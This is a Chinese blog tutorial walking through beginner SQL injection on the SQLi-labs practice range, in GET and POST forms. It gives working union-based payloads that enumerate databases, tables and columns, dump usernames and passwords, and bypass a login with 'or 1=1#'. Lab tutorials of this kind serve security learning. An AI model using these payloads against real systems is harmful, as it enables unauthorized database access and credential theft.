一篇文章教你玩转,入门级 SQL 注入实战!

于 2024-04-11 12:55:43 发布
阅读量547 收藏 8
点赞数 11
文章标签: SQL 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58552717/article/details/137634844
版权

 

SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或

过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了

SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战

一、实战准备

安全测试靶场:SQLi-labs

工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具

二、SQL注入思路

1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据

三、SQL注入实战-Get场景

进入SQLi-labs的Less-1关,输入id的值

1、id=1' ,发起请求,返回SQL语法错误

图片

2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞

图片

3、判断当前表的字段数

select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。

输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。

图片

输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!

图片

4、获取数据库库名

使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。

id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。

图片

5、获取数据库的表名

id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。

图片

6、获取表中的字段名

id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。

图片

7、获取表中需要的数据

id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;

可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。

图片

四、SQL注入实战-POST场景

进入SQLi-labs的Less-11关,输入Username、Password。

1、判断是否存在sql注入漏洞

在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。

图片

直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。

图片

2、判断当前查询表的字段数

通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:

图片

在burpsuite中分别修改数据,进行后续步骤的操作:

uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。

图片

图片

3、获取当前数据库名

uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。

图片

4、获取当前数据库下的表名

uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息

图片

5、获取表中字段名

uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password

图片

6、获取表中数据

uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。

图片

 

当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!

 

学无止境,行以致远!

程序员与诗人
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2199
sql手工注入封神台靶场
SQL注入实战操作
ting_liang的博客
01-19 591
在url中,如果是get请求(记住是get请求,也就是我们在浏览器中输入的ur),解释执行的时候,ur中#号是用来指导浏览器动作的,对服务器端无用。(有个空格),在传输过程中空格会被忽略同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。mysql数据库注释(#、-- 空格(%20)、/*...*/、/*!2、cms注入:CMS逻辑:index.php首页展示内容,具有文章列表(链接具有文章id)、articles.php文。1、有回显(基于错误的)
SQL注入实战
qq_44915227的博客
04-17 1763
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入实战
hxhabcd123的博客
08-28 2397
本文记录各种SQL注入类型的实操过程
sql注入实战
2201_75735270的博客
07-31 874
SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。
SQL注入实战总结
qq_44657899的博客
06-16 1384
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
推荐一篇入门级的Class文章
10-30
推荐一篇入门级的Class
OracleSQL入门级PPT程汇总
07-23
程名称:Oracle SQL入门级PPT程汇总课程目录:【】第1章 简单查询语句【】第2章 限定查询和排序【】第3章 单行函数【】第4章 多表查询【】第5章 组函数和分组统计 资源太大,传百度网盘了,链接在附件中,有需要...
一篇文章带你入门Oracle注入1
08-03
1. varchar, varchar2 表示个字符串 3. DATA 表示期类型 4. CLOB 对象,表示本数据类型,可存4G 5. BLOB 对象,表示进
sql语句实战
12-14
数据库表 sql语句格式: 实战: 设置sc(成绩表)表中sno,cno唯一键 alter table sc add unique(sno,cno); 查询所有同学的学号、姓名、选课数、总成绩 SELECT sc.sno,sname,COUNT(cno) '选课数',SUM(score) 'sum' FROM student,sc WHERE sc.sno=student.sno GROUP BY sc.sno 查询姓“李”的老师的个数 SELECT count(tno) FROM teacher where tname LIKE '李%' 求选择了Java课程且成绩小于60的同学
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
记一次对真实网站的SQL注入实战
qq_43678263的博客
03-31 4801
记一次对真实网站的SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
SQL(入门实战-01)
weixin_44464850的博客
04-19 734
1.查询结果去重 mysql练习 drop table if exists user_profile; CREATE TABLE `user_profile` ( `id` int NOT NULL, `device_id` int NOT NULL, `gender` varchar(14) NOT NULL, `age` int , `university` varchar(32) NOT NULL, `province` varcha
【网络安全】SQL注入_sql注入攻击实例(网安人必学系列)
最新发布
weixin_57514792的博客
02-25 1204
网络安全必学SQL注入
2.2 SQL入门和实战
Micoreal的博客
01-15 835
个人学习笔记,有兴趣可以看看
SQL注入【ByPass有点难的靶场实战】(九)
12-30 1045
SQL注入【ByPass有点难的靶场实战
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4271
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。
[第一章 web入门]sql注入-1
06-28
### 回答1: SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码。 SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值